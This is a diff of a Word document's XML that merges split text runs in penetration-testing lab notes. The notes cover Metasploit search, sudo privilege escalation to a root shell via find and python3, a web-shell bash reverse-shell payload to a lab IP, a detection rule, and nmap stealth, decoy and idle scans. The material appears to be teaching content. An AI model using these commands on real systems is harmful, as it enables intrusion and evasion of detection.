-        <w:t xml:space="preserve"> One of the most useful commands in </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>msfconsole</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> is search. This command will search the Metasploit Framework database for modules relevant to the given search parameter.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>You can conduct searches using CVE numbers, exploit names (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>eternalblue</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>heartbleed</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>, etc.), or target system.</w:t>
+        <w:t xml:space="preserve"> One of the most useful commands in msfconsole is search. This command will search the Metasploit Framework database for modules relevant to the given search parameter.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>You can conduct searches using CVE numbers, exploit names (eternalblue, heartbleed, etc.), or target system.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3948,53 +2372,28 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">See what commands you can run with </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> without password.</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -l</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve"># Example output:# User </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>user</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> may run the following commands on host:</w:t>
+        <w:t>See what commands you can run with sudo without password.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sudo -l</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t># Example output:# User user may run the following commands on host:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4006,23 +2405,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>(root) NOPASSWD: /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>usr</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>/bin/find</w:t>
+        <w:t>(root) NOPASSWD: /usr/bin/find</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4040,23 +2423,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>(root) NOPASSWD: /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>usr</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>/bin/python3</w:t>
+        <w:t>(root) NOPASSWD: /usr/bin/python3</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -4067,15 +2434,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Use allowed </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> commands to get a root shell.</w:t>
+        <w:t>Use allowed sudo commands to get a root shell.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4090,21 +2449,12 @@
           <w:bCs/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> bash</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sudo bash</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4125,21 +2475,12 @@
           <w:bCs/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> find / -exec /bin/bash \;</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sudo find / -exec /bin/bash \;</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -4155,53 +2496,12 @@
           <w:bCs/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> python3 -c 'import </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>os</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>os.system</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>("/bin/bash")'</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sudo python3 -c 'import os; os.system("/bin/bash")'</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4248,70 +2548,22 @@
           <w:bCs/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>192.168.46.117/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>shell.php?cmd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>=</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Payload: bash -c 'bash -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>i</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>tcp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>/192.168.47.167/9090 0&gt;&amp;1'</w:t>
+        <w:t>192.168.46.117/shell.php?cmd=</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Payload: bash -c 'bash -i &gt;&amp; /dev/tcp/192.168.47.167/9090 0&gt;&amp;1'</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4542,94 +2794,30 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">alert </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>tcp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> any </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>any</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -&gt; $HOME_NET 21 (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>flags:SAR</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>;...)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>XMAS Scan (-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sX</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>):</w:t>
+        <w:t>alert tcp any any -&gt; $HOME_NET 21 (flags:SAR;...)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>XMAS Scan (-sX):</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4659,37 +2847,12 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sX</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -p 20-25 192.168.56.20</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap -sX -p 20-25 192.168.56.20</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -4747,82 +2910,33 @@
           <w:bCs/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sS</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -g 53 192.168.56.20</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Wireshark Analysis: Run a Wireshark capture on your Kali interface (eth0 or similar) during the second scan. Apply the filter </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tcp.port</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> == 53. You should see that your scan packets are originating from port 53 on your machine.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>NULL Scan (-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sN</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>):</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap -sS -g 53 192.168.56.20</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Wireshark Analysis: Run a Wireshark capture on your Kali interface (eth0 or similar) during the second scan. Apply the filter tcp.port == 53. You should see that your scan packets are originating from port 53 on your machine.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>NULL Scan (-sN):</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4857,37 +2971,12 @@
           <w:bCs/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sN</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -p 20-25 192.168.56.20</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap -sN -p 20-25 192.168.56.20</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -4952,81 +3041,24 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
+        <w:t># nmap -sS -D 192.168.56.30,192.168.56.40,x.x.x.x 192.168.56.20</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>OR</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sS</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -D 192.168.56.30,192.168.56.40,x.x.x.x 192.168.56.20</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>OR</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve"># </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sS</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -D ME,RND:10 192.168.56.20</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap -sS -D ME,RND:10 192.168.56.20</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5039,69 +3071,28 @@
       <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sS</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -D RND:10 192.168.56.101</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Idle/Zombie Scan (-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sI</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>): PASSIVE SCAN:</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap -sS -D RND:10 192.168.56.101</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Idle/Zombie Scan (-sI): PASSIVE SCAN:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5125,73 +3116,16 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve"># Command: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sI</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> &lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>zombie_ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>&gt; &lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>target_ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sI</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 192.168.56.30 192.168.56.20</w:t>
+        <w:t># Command: nmap -sI &lt;zombie_ip&gt; &lt;target_ip&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap -sI 192.168.56.30 192.168.56.20</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5237,23 +3171,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>1) Enable service/version detection (-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sV</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>), OS detection (-O), and default script scanning (-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sC</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>) to get a complete picture in one go.</w:t>
+        <w:t>1) Enable service/version detection (-sV), OS detection (-O), and default script scanning (-sC) to get a complete picture in one go.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5268,69 +3186,12 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -p0-65535 -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sS</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sV</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -O -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sC</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --reason 192.168.56.20</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap -p0-65535 -sS -sV -O -sC --reason 192.168.56.20</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5344,13 +3205,8 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sS</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>-sS</w:t>
+      </w:r>
       <w:r>
         <w:tab/>
       </w:r>
@@ -5361,13 +3217,8 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sV</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>-sV</w:t>
+      </w:r>
       <w:r>
         <w:tab/>
       </w:r>
@@ -5390,13 +3241,8 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sC</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>-sC</w:t>
+      </w:r>
       <w:r>
         <w:tab/>
       </w:r>
@@ -5423,15 +3269,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>a) Ultimate Stealth: Use the Idle Scan (-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sI</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>) to ensure zero packets are sent from your IP to the target.</w:t>
+        <w:t>a) Ultimate Stealth: Use the Idle Scan (-sI) to ensure zero packets are sent from your IP to the target.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5451,188 +3289,74 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
+        <w:t># nmap -sSVC -p- --source-port 53 --min-parallelism 10 --min-hostgroup 10 --max-hostgroup 20 --max-retries 2 --max-scan-delay 5 target_range</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">--min-parallelism 10  </w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>: 10 Parallel tasks</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>--max-retries 2</w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>: Number of Retry Probing Ports</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>--max-scan-delay 5</w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>: Delay between each scan</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>--min-hostgroup 10 --max-hostgroup 20</w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>: Scan min 10 and max 20 hosts at one time</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>_______________________________</w:t>
